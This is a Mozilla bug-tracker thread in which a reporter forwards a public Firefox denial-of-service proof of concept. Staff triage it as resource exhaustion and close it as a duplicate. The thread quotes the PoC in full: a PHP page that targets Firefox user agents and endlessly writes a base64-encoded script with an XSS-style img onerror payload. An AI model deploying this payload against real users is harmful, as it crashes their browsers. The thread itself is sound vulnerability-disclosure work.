Closed
Bug 822264
Opened 12 years ago
Closed 12 years ago
possible exploitable crash
Categories
(Core :: DOM: Core & HTML, defect)
Core
DOM: Core & HTML
Tracking
()
RESOLVED
DUPLICATE
of bug 817629
People
(Reporter: curtisk, Unassigned)
References
()
Details
reported to sec@ =============//============= Hi, i tried this exploit http://1337day.com/exploit/19964 in a fully updated mozilla browser and it did crash. The problem is that according to the immunity debugger logs, it may be possible for someone to inject a shellcode. In case you need anything, contact me to help out. Best regards Mavrofidis Manolis -- Πέτρην κοιλαίνει ρανίς ύδατος ενδελεχείη. http://0x109.tuxfamily.org =============//============= copied script from quoted site =============//============= <!DOCTYPE html> <html> <body> <?php /* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman Base64 encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/ $exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+'; //check if victim is Using Mozilla Firefox $firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false; if ($firefox) { //loop forever while(1) { //print exploit code infinite times. print(base64_decode($exploit)); } } ?> </body> </html> # 1337day.com [2012-12-17]
Reporter | ||
Updated•12 years ago
|
Flags: sec-bounty?
Comment 1•12 years ago
|
||
What are "immunity debugger logs"? This is a DOS in the most obvious form. Do they have crash report IDs?
Comment 2•12 years ago
|
||
Seems to be http://www.immunitysec.com/products-immdbg.shtml
Immunity debugger "logs" are not logs, it is a word I used to avoid mentioning everything about the CPU registers, the heap, the stack etc. I did set up immunity dbg(later will be reffered as dbg) as just in-time debugger. Well, according to the dbg and the information it revealed about the firefox crash, registers and the heap allocation show a potential exploit out of this DOS vulnerability. As of this time, I haven't been able to build a stable exploit, I guess it needs some egg-hunting shellcode and I don't have sufficient time for this now, I may be attaching the firefox js engine in the debugger for more information about the subject. Best regards, Manolis
Comment 4•12 years ago
|
||
Can you just provide a regular crash ID or a stack trace?
Flags: needinfo?(mmavrofides)
Reporter | ||
Comment 6•12 years ago
|
||
We are getting multiple reports of this same code from various sources. I suspect that there is a site that has this code and we are just now getting informed of these.
Comment 7•12 years ago
|
||
http://pastebin.com/SigzqudB Title : Mozilla Firefox HTML/JS DOS Vulnerability - POC Version : Mozilla Firefox Beta Version and Normal 17.0.1 Date : 2012-12-06 Vendor : http://www.mozilla.org Impact : Medium Contact : sergioyoshiman [at] gmail.com Twitter : @sergioyoshiman tested : windows XP SP3 & Windows 7 SP1 Author : Sergio Yoshikata - Lima , Peru ============================================================== Mozilla Firefox JS POC "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
Updated•12 years ago
|
There is a site with the PoC, I already included it in my mail. I'll get you with a Crash ID and a trace in a couple of hours. I have a class now, so bear with me :)
Flags: needinfo?(mmavrofides)
Btw, it is being heavily distributed under a lot of sites such as 1337day.org and the rest dbs containing exploits, beyond the pastebin and the http://1337day.com/exploit/19964 . Full disclosure is the case here
Comment 10•12 years ago
|
||
It is being reported as a DOS. If you have information that this is exploitable, I haven't seen that publicly reported yet and I'd like to keep this closed until we know for sure.
Group: core-security
Updated•12 years ago
|
Group: mozilla-corporation-confidential, core-security
Updated•12 years ago
|
Group: mozilla-corporation-confidential
Comment 11•12 years ago
|
||
I already told you before, I have built an exploit that doesn't work at the time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the same vulnerability* that makes Firefox crash. I won't be giving the exploit. If I was to give the exploit, I'd build a stable one and then I'd sell it in the market and get some cash. Don't make the same mistakes other vendors do. Just patch the hole and if the exploit still works, I'll let you know with the exploit included. Best regards, Manolis PS: The DoS is confirmed. The exploit works in OSes that don't have built-in protections such as ASLR,DEP etc. I'll be adding the crash ID in ten minutes hopefully.
Comment 12•12 years ago
|
||
The code here is identical to bug 817629, down to the alert(2) bit. As I said in that bug, as far as I can tell this is not a security issue other than DoS, and is a duplicate of known non-security bugs. I'll be happy to be proved wrong, of course!
Comment 13•12 years ago
|
||
(In reply to Manolis Mavrofidis from comment #11) > I already told you before, I have built an exploit that doesn't work at the > time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the > same vulnerability* that makes Firefox crash. I won't be giving the exploit. > If I was to give the exploit, I'd build a stable one and then I'd sell it in > the market and get some cash. You don't need an exploit to bypass ASLR/DEP to earn some bug bounty cash from us, but we do need to see something more than resource exhaustion.
Comment 14•12 years ago
|
||
OK, I'll dig into the subject further, build a stable exploit, and I'll file a new report with the exploit and/or further bugs that I may find during the exploration. Happy XMAS holidays everyone and guys, fix the bug :) Manolis.
Updated•12 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Comment 16•11 years ago
|
||
Triage: opening this up.
Group: core-security
Flags: sec-bounty? → sec-bounty-
Assignee | ||
Updated•5 years ago
|
Component: DOM → DOM: Core & HTML
You need to log in
before you can comment on or make changes to this bug.
Description
•